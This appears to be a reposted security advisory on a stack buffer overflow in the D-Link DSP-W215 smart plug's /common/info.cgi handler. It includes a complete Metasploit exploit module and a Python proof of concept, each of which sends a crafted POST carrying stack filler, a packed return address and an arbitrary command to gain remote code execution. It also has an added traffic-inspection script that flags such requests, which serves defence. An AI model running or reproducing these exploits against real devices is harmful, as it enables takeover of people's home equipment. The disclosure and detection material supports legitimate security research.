D-Link DSP-W215 '/common/info.cgi' Handler Stack Buffer Overflow Vulnerability

Source: Internet
Author: User


Release date:
Updated on:

Affected Systems:
D-Link DSP-W215
Description:
--------------------------------------------------------------------------------
Bugtraq id: 68521
 
The D-Link DSP-W215 is a smart plug that tracks household energy usage and manages smart sockets for household appliances.
 
The my_cgi.cgi component of the D-Link DSP-W215 contains a stack-based buffer overflow in its handling of requests addressed to /common/info.cgi. A specially crafted POST request to that handler triggers the overflow and can allow a malicious user to execute arbitrary code in the context of the affected device.
 
Source: Craig Heffner

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link info.cgi POST Request Buffer Overflow',
      'Description'    => %q{
          This module exploits an anonymous remote code execution vulnerability on different D-Link
        devices. The vulnerability is a stack-based buffer overflow in the my_cgi.cgi component,
        when handling specially crafted POST HTTP requests addressed to the /common/info.cgi
        handler. This module has been successfully tested on D-Link DSP-W215 in an emulated
        environment.
      },
      'Author'         =>
        [
          'Craig Heffner', # vulnerability discovery and initial PoC
          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch'           => ARCH_MIPSBE,
      'References'     =>
        [
          ['OSVDB', '123'],
          ['URL', 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/'] # blog post from Craig including PoC
        ],
      'Targets'        =>
        [
          #
          # Automatic targeting via fingerprinting
          #
          ['Automatic Targeting', { 'auto' => true }],
          ['D-Link DSP-W215 - v1.02',
            {
              'Offset' => 477472,
              'Ret'    => 0x405cec # jump to system - my_cgi.cgi
            }
          ]
        ],
      'DisclosureDate' => 'May 22 2014',
      'DefaultTarget'  => 0))

    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    begin
      res = send_request_cgi({
        'uri'    => "/common/info.cgi",
        'method' => 'GET'
      })

      if res && [200, 301, 302].include?(res.code)
        if res.body =~ /DSP-W215A1/ && res.body =~ /1.02/
          @my_target = targets[1] if target['auto']
          return Exploit::CheckCode::Appears
        end

        return Exploit::CheckCode::Detected
      end

    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Trying to access the vulnerable URL...")

    @my_target = target
    check_code = check

    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
      fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
    end

    if @my_target.nil? || @my_target['auto']
      fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
    end

    print_status("#{peer} - Exploiting #{@my_target.name}...")
    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 185
    )
  end

  def prepare_shellcode(cmd)
    buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler
    buf << [@my_target.ret].pack("N")                   # Overwrite $ra -> jump to system

    # la    $t9, system
    # la    $s1, 0x440000
    # jalr  $t9 ; system
    # addiu $a0, $sp, 0x28 # our command

    buf << rand_text_alpha_upper(40) # Command to execute must be at $sp+0x28
    buf << cmd                       # Command to execute
    buf << "\x00"                    # NULL terminate the command
  end

  def execute_command(cmd, opts)
    shellcode = prepare_shellcode(cmd)

    begin
      res = send_request_cgi({
        'method'        => 'POST',
        'uri'           => "/common/info.cgi",
        'encode_params' => false,
        'vars_post'     => {
          'storage_path' => shellcode,
        }
      }, 5)
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
 

#!/usr/bin/env python

import sys
import urllib2

try:
    target = sys.argv[1]
    command = sys.argv[2]
except:
    print "Usage: %s <target> <command>" % sys.argv[0]
    sys.exit(1)

url = "http://%s/common/info.cgi" % target

buf = "storage_path="          # POST parameter name
buf += "D" * (0x74944 - 36)    # Stack filler
buf += "\x00\x40\x5C\xEC"      # Overwrite $ra
buf += "E" * 0x28              # Command to execute must be at $sp+0x28
buf += command                 # Command to execute
buf += "\x00"                  # NULL terminate the command

req = urllib2.Request(url, buf)
print urllib2.urlopen(req).read()
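Both the Metasploit module and the PoC above send a POST to /common/info.cgi whose storage_path parameter is hundreds of kilobytes long, carries a raw big-endian return address and ends in a NUL byte. A defender watching traffic to these devices can flag that shape without knowing the exact offset. The following Python 3 script is an added example, not part of the original advisory or of either PoC: it parses a raw HTTP request, decodes the form body without losing non-printable bytes, and reports a finding when a POST to the vulnerable path carries an oversized, NUL-containing or high-byte storage_path value. The sample requests, the 192.0.2.10 host and the 256-byte length threshold are constructed assumptions for the example.

```python
import re
from urllib.parse import unquote_to_bytes

VULN_PATH = b"/common/info.cgi"
STORAGE_PARAM = b"storage_path"
MAX_STORAGE_PATH = 256  # assumed sane upper bound for a storage path on this device


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_form_body(body: bytes):
    """Decode an application/x-www-form-urlencoded body into {name: value}.

    Values are percent-decoded but kept as raw bytes, so embedded NULs and
    non-ASCII bytes (such as a packed return address) survive inspection.
    """
    params = {}
    for pair in body.split(b"&"):
        if not pair:
            continue
        name, _, value = pair.partition(b"=")
        params[unquote_to_bytes(name)] = unquote_to_bytes(value)
    return params


def inspect_request(raw: bytes):
    """Return findings for requests matching the info.cgi storage_path overflow shape."""
    findings = []
    method, path, _headers, body = parse_http_request(raw)
    if method.upper() != b"POST" or path.split(b"?")[0] != VULN_PATH:
        return findings
    value = parse_form_body(body).get(STORAGE_PARAM)
    if value is None:
        return findings
    if len(value) > MAX_STORAGE_PATH:
        findings.append(f"storage_path length {len(value)} exceeds {MAX_STORAGE_PATH}")
    if b"\x00" in value:
        findings.append("storage_path contains a NUL byte")
    if re.search(rb"[\x80-\xff]", value):
        findings.append("storage_path contains non-ASCII bytes (possible packed address)")
    return findings


def make_request(path: bytes, body: bytes) -> bytes:
    """Build a constructed HTTP POST request (sample data, not captured traffic)."""
    return (b"POST " + path + b" HTTP/1.1\r\n"
            b"Host: 192.0.2.10\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


# Constructed samples: a benign form post, a shortened stand-in for the advisory's
# payload (filler, big-endian $ra bytes, $sp+0x28 padding, command, NUL), and a
# large post to an unrelated path that should not be flagged.
BENIGN_REQUEST = make_request(VULN_PATH, b"storage_path=%2Fmnt%2Fusb&action=get")
ATTACK_REQUEST = make_request(
    VULN_PATH,
    b"storage_path=" + b"D" * 4096 + b"\x00\x40\x5c\xec" + b"E" * 0x28 + b"id" + b"\x00",
)
OTHER_PATH_REQUEST = make_request(b"/common/other.cgi", b"storage_path=" + b"A" * 5000)


if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("attack", ATTACK_REQUEST),
                       ("other", OTHER_PATH_REQUEST)):
        print(label, inspect_request(req) or "no findings")
```

The threshold is deliberately loose: a legitimate storage_path is a short filesystem path, so anything past a few hundred bytes is already anomalous, and the NUL and high-byte checks catch the packed return address even if an attacker trims the filler to a different offset.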

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
D-Link
------
At the time of writing, the vendor has not released a patch or upgrade. Users of the affected device should follow the vendor's homepage to obtain the latest firmware:
 
http://www.dlink.com/us/en/home-solutions/connected-home/smart-plugs/dsp-w215
